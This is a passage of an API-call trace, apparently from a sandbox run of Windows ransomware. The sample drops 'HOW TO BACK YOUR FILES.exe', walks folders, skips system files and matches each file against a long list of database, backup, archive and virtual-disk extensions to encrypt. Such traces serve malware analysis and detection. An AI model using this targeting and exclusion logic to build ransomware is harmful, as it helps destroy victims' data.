User\\Searches") returned="C:\\Users\\Default User\\Searches" [0059.077] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.077] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Searches\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\searches\\how to back your files.exe"), bFailIfExists=1) returned 0 [0059.077] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.077] GetLastError () returned 0x20 [0059.077] Sleep (dwMilliseconds=0xc8) [0059.277] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.277] GetLastError () returned 0x20 [0059.277] Sleep (dwMilliseconds=0xc8) [0059.477] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0059.477] GetLastError () returned 0x0 [0059.477] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0059.477] ReadFile (in: hFile=0x164, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0059.477] CloseHandle (hObject=0x164) returned 1 [0059.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0059.477] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.477] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Searches\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49e569e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49e569e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.478] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.478] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.478] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.478] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49e569e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49e569e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.478] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.478] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0059.478] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.478] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.478] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0059.478] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.478] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0059.478] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0059.478] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0059.478] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0059.478] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0059.478] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0059.478] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0059.478] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0059.478] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0059.478] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0059.478] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0059.478] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0059.478] lstrlenW (lpString="desktop.ini") returned 11 [0059.478] lstrlenW (lpString="C:\\Users\\Default User\\Searches\\*") returned 32 [0059.478] lstrcpyW (in: lpString1=0x2cce43e, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0059.478] lstrlenW (lpString="desktop.ini") returned 11 [0059.478] lstrlenW (lpString="Ares865") returned 7 [0059.478] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0059.478] lstrlenW (lpString=".dll") returned 4 [0059.478] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0059.478] lstrlenW (lpString=".lnk") returned 4 [0059.478] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0059.478] lstrlenW (lpString=".ini") returned 4 [0059.478] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0059.479] lstrlenW (lpString=".sys") returned 4 [0059.479] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0059.479] lstrlenW (lpString="desktop.ini") returned 11 [0059.479] lstrlenW (lpString="bak") returned 3 [0059.479] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0059.479] lstrlenW (lpString="ba_") returned 3 [0059.479] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0059.479] lstrlenW (lpString="dbb") returned 3 [0059.479] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0059.479] lstrlenW (lpString="vmdk") returned 4 [0059.479] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0059.479] lstrlenW (lpString="rar") returned 3 [0059.479] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0059.479] lstrlenW (lpString="zip") returned 3 [0059.479] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0059.479] lstrlenW (lpString="tgz") returned 3 [0059.479] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0059.479] lstrlenW (lpString="vbox") returned 4 [0059.479] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0059.479] lstrlenW (lpString="vdi") returned 3 [0059.479] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0059.479] lstrlenW (lpString="vhd") returned 3 [0059.479] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0059.479] lstrlenW (lpString="vhdx") returned 4 [0059.479] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0059.479] lstrlenW (lpString="avhd") returned 4 [0059.479] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0059.479] lstrlenW (lpString="db") returned 2 [0059.479] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0059.479] lstrlenW (lpString="db2") returned 3 [0059.479] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0059.479] lstrlenW (lpString="db3") returned 3 [0059.479] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0059.479] lstrlenW (lpString="dbf") returned 3 [0059.479] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0059.479] lstrlenW (lpString="mdf") returned 3 [0059.479] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0059.480] lstrlenW (lpString="mdb") returned 3 [0059.480] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0059.480] lstrlenW (lpString="sql") returned 3 [0059.480] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0059.480] lstrlenW (lpString="sqlite") returned 6 [0059.480] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0059.480] lstrlenW (lpString="sqlite3") returned 7 [0059.480] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0059.480] lstrlenW (lpString="sqlitedb") returned 8 [0059.480] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0059.480] lstrlenW (lpString="xml") returned 3 [0059.480] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0059.480] lstrlenW (lpString="$er") returned 3 [0059.480] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0059.480] lstrlenW (lpString="4dd") returned 3 [0059.480] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0059.480] lstrlenW (lpString="4dl") returned 3 [0059.480] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0059.480] lstrlenW (lpString="^^^") returned 3 [0059.480] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0059.480] lstrlenW (lpString="abs") returned 3 [0059.480] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0059.480] lstrlenW (lpString="abx") returned 3 [0059.480] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0059.480] lstrlenW (lpString="accdb") returned 5 [0059.480] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0059.480] lstrlenW (lpString="accdc") returned 5 [0059.480] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0059.480] lstrlenW (lpString="accde") returned 5 [0059.480] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0059.480] lstrlenW (lpString="accdr") returned 5 [0059.480] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0059.480] lstrlenW (lpString="accdt") returned 5 [0059.480] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0059.480] lstrlenW (lpString="accdw") returned 5 [0059.480] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0059.480] lstrlenW (lpString="accft") returned 5 [0059.481] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0059.481] lstrlenW (lpString="adb") returned 3 [0059.481] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0059.481] lstrlenW (lpString="adb") returned 3 [0059.481] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0059.481] lstrlenW (lpString="ade") returned 3 [0059.481] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0059.481] lstrlenW (lpString="adf") returned 3 [0059.481] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0059.481] lstrlenW (lpString="adn") returned 3 [0059.481] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0059.481] lstrlenW (lpString="adp") returned 3 [0059.481] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0059.481] lstrlenW (lpString="alf") returned 3 [0059.481] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0059.481] lstrlenW (lpString="ask") returned 3 [0059.481] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0059.481] lstrlenW (lpString="btr") returned 3 [0059.481] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0059.481] lstrlenW (lpString="cat") returned 3 [0059.481] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0059.481] lstrlenW (lpString="cdb") returned 3 [0059.481] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0059.481] lstrlenW (lpString="ckp") returned 3 [0059.481] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0059.481] lstrlenW (lpString="cma") returned 3 [0059.481] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0059.481] lstrlenW (lpString="cpd") returned 3 [0059.481] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0059.481] lstrlenW (lpString="dacpac") returned 6 [0059.481] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0059.481] lstrlenW (lpString="dad") returned 3 [0059.481] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0059.481] lstrlenW (lpString="dadiagrams") returned 10 [0059.481] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0059.481] lstrlenW (lpString="daschema") returned 8 [0059.481] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0059.481] lstrlenW (lpString="db-journal") returned 10 [0059.482] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0059.482] lstrlenW (lpString="db-shm") returned 6 [0059.482] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0059.482] lstrlenW (lpString="db-wal") returned 6 [0059.482] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0059.482] lstrlenW (lpString="dbc") returned 3 [0059.482] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0059.482] lstrlenW (lpString="dbs") returned 3 [0059.482] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0059.482] lstrlenW (lpString="dbt") returned 3 [0059.482] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0059.482] lstrlenW (lpString="dbv") returned 3 [0059.482] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0059.482] lstrlenW (lpString="dbx") returned 3 [0059.482] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0059.482] lstrlenW (lpString="dcb") returned 3 [0059.482] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0059.482] lstrlenW (lpString="dct") returned 3 [0059.482] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0059.482] lstrlenW (lpString="dcx") returned 3 [0059.482] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0059.482] lstrlenW (lpString="ddl") returned 3 [0059.482] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0059.482] lstrlenW (lpString="dlis") returned 4 [0059.482] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0059.482] lstrlenW (lpString="dp1") returned 3 [0059.482] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0059.482] lstrlenW (lpString="dqy") returned 3 [0059.482] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0059.482] lstrlenW (lpString="dsk") returned 3 [0059.482] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0059.482] lstrlenW (lpString="dsn") returned 3 [0059.482] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0059.482] lstrlenW (lpString="dtsx") returned 4 [0059.482] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0059.482] lstrlenW (lpString="dxl") returned 3 [0059.482] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0059.482] lstrlenW (lpString="eco") returned 3 [0059.482] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0059.483] lstrlenW (lpString="ecx") returned 3 [0059.483] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0059.483] lstrlenW (lpString="edb") returned 3 [0059.483] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0059.483] lstrlenW (lpString="epim") returned 4 [0059.483] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0059.483] lstrlenW (lpString="fcd") returned 3 [0059.483] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0059.483] lstrlenW (lpString="fdb") returned 3 [0059.483] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0059.483] lstrlenW (lpString="fic") returned 3 [0059.483] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0059.483] lstrlenW (lpString="flexolibrary") returned 12 [0059.483] lstrlenW (lpString="fm5") returned 3 [0059.483] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0059.483] lstrlenW (lpString="fmp") returned 3 [0059.483] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0059.483] lstrlenW (lpString="fmp12") returned 5 [0059.483] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0059.483] lstrlenW (lpString="fmpsl") returned 5 [0059.483] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0059.483] lstrlenW (lpString="fol") returned 3 [0059.483] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0059.483] lstrlenW (lpString="fp3") returned 3 [0059.483] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0059.483] lstrlenW (lpString="fp4") returned 3 [0059.483] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0059.483] lstrlenW (lpString="fp5") returned 3 [0059.483] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0059.483] lstrlenW (lpString="fp7") returned 3 [0059.483] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0059.483] lstrlenW (lpString="fpt") returned 3 [0059.483] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0059.483] lstrlenW (lpString="frm") returned 3 [0059.483] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0059.483] lstrlenW (lpString="gdb") returned 3 [0059.483] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0059.483] lstrlenW (lpString="gdb") returned 3 [0059.484] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0059.484] lstrlenW (lpString="grdb") returned 4 [0059.484] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0059.484] lstrlenW (lpString="gwi") returned 3 [0059.484] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0059.484] lstrlenW (lpString="hdb") returned 3 [0059.484] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0059.484] lstrlenW (lpString="his") returned 3 [0059.484] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0059.484] lstrlenW (lpString="ib") returned 2 [0059.484] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0059.484] lstrlenW (lpString="idb") returned 3 [0059.484] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0059.484] lstrlenW (lpString="ihx") returned 3 [0059.484] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0059.484] lstrlenW (lpString="itdb") returned 4 [0059.484] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0059.484] lstrlenW (lpString="itw") returned 3 [0059.484] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0059.484] lstrlenW (lpString="jet") returned 3 [0059.484] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0059.484] lstrlenW (lpString="jtx") returned 3 [0059.484] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0059.484] lstrlenW (lpString="kdb") returned 3 [0059.484] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0059.484] lstrlenW (lpString="kexi") returned 4 [0059.484] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0059.484] lstrlenW (lpString="kexic") returned 5 [0059.484] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0059.484] lstrlenW (lpString="kexis") returned 5 [0059.484] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0059.484] lstrlenW (lpString="lgc") returned 3 [0059.484] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0059.484] lstrlenW (lpString="lwx") returned 3 [0059.484] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0059.484] lstrlenW (lpString="maf") returned 3 [0059.484] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0059.484] lstrlenW (lpString="maq") returned 3 [0059.485] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0059.485] lstrlenW (lpString="mar") returned 3 [0059.485] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0059.485] lstrlenW (lpString="marshal") returned 7 [0059.485] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0059.485] lstrlenW (lpString="mas") returned 3 [0059.485] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0059.485] lstrlenW (lpString="mav") returned 3 [0059.485] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0059.485] lstrlenW (lpString="maw") returned 3 [0059.485] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0059.485] lstrlenW (lpString="mdbhtml") returned 7 [0059.485] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0059.485] lstrlenW (lpString="mdn") returned 3 [0059.485] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0059.485] lstrlenW (lpString="mdt") returned 3 [0059.485] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0059.485] lstrlenW (lpString="mfd") returned 3 [0059.485] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0059.485] lstrlenW (lpString="mpd") returned 3 [0059.485] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0059.485] lstrlenW (lpString="mrg") returned 3 [0059.485] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0059.485] lstrlenW (lpString="mud") returned 3 [0059.485] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0059.485] lstrlenW (lpString="mwb") returned 3 [0059.485] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0059.485] lstrlenW (lpString="myd") returned 3 [0059.485] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0059.485] lstrlenW (lpString="ndf") returned 3 [0059.485] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0059.485] lstrlenW (lpString="nnt") returned 3 [0059.485] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0059.485] lstrlenW (lpString="nrmlib") returned 6 [0059.485] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0059.485] lstrlenW (lpString="ns2") returned 3 [0059.485] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0059.485] lstrlenW (lpString="ns3") returned 3 [0059.486] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0059.486] lstrlenW (lpString="ns4") returned 3 [0059.486] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0059.486] lstrlenW (lpString="nsf") returned 3 [0059.486] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0059.486] lstrlenW (lpString="nv") returned 2 [0059.486] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0059.486] lstrlenW (lpString="nv2") returned 3 [0059.486] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0059.486] lstrlenW (lpString="nwdb") returned 4 [0059.486] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0059.486] lstrlenW (lpString="nyf") returned 3 [0059.486] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0059.486] lstrlenW (lpString="odb") returned 3 [0059.486] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0059.486] lstrlenW (lpString="odb") returned 3 [0059.486] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0059.486] lstrlenW (lpString="oqy") returned 3 [0059.486] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0059.486] lstrlenW (lpString="ora") returned 3 [0059.486] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0059.486] lstrlenW (lpString="orx") returned 3 [0059.486] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0059.486] lstrlenW (lpString="owc") returned 3 [0059.486] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0059.486] lstrlenW (lpString="p96") returned 3 [0059.486] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0059.486] lstrlenW (lpString="p97") returned 3 [0059.486] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0059.486] lstrlenW (lpString="pan") returned 3 [0059.486] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0059.486] lstrlenW (lpString="pdb") returned 3 [0059.486] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0059.486] lstrlenW (lpString="pdm") returned 3 [0059.486] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0059.486] lstrlenW (lpString="pnz") returned 3 [0059.486] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0059.486] lstrlenW (lpString="qry") returned 3 [0059.487] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0059.487] lstrlenW (lpString="qvd") returned 3 [0059.487] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0059.487] lstrlenW (lpString="rbf") returned 3 [0059.487] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0059.487] lstrlenW (lpString="rctd") returned 4 [0059.487] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0059.487] lstrlenW (lpString="rod") returned 3 [0059.487] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0059.487] lstrlenW (lpString="rodx") returned 4 [0059.487] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0059.487] lstrlenW (lpString="rpd") returned 3 [0059.487] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0059.487] lstrlenW (lpString="rsd") returned 3 [0059.487] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0059.487] lstrlenW (lpString="sas7bdat") returned 8 [0059.487] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0059.487] lstrlenW (lpString="sbf") returned 3 [0059.487] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0059.487] lstrlenW (lpString="scx") returned 3 [0059.487] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0059.487] lstrlenW (lpString="sdb") returned 3 [0059.487] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0059.487] lstrlenW (lpString="sdc") returned 3 [0059.487] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0059.487] lstrlenW (lpString="sdf") returned 3 [0059.487] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0059.487] lstrlenW (lpString="sis") returned 3 [0059.487] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0059.487] lstrlenW (lpString="spq") returned 3 [0059.487] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0059.487] lstrlenW (lpString="te") returned 2 [0059.487] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0059.487] lstrlenW (lpString="teacher") returned 7 [0059.487] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0059.487] lstrlenW (lpString="tmd") returned 3 [0059.487] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0059.487] lstrlenW (lpString="tps") returned 3 [0059.488] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0059.488] lstrlenW (lpString="trc") returned 3 [0059.488] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0059.488] lstrlenW (lpString="trc") returned 3 [0059.488] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0059.488] lstrlenW (lpString="trm") returned 3 [0059.488] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0059.488] lstrlenW (lpString="udb") returned 3 [0059.488] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0059.488] lstrlenW (lpString="udl") returned 3 [0059.488] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0059.488] lstrlenW (lpString="usr") returned 3 [0059.488] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0059.488] lstrlenW (lpString="v12") returned 3 [0059.488] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0059.488] lstrlenW (lpString="vis") returned 3 [0059.488] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0059.488] lstrlenW (lpString="vpd") returned 3 [0059.488] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0059.488] lstrlenW (lpString="vvv") returned 3 [0059.488] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0059.488] lstrlenW (lpString="wdb") returned 3 [0059.488] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0059.488] lstrlenW (lpString="wmdb") returned 4 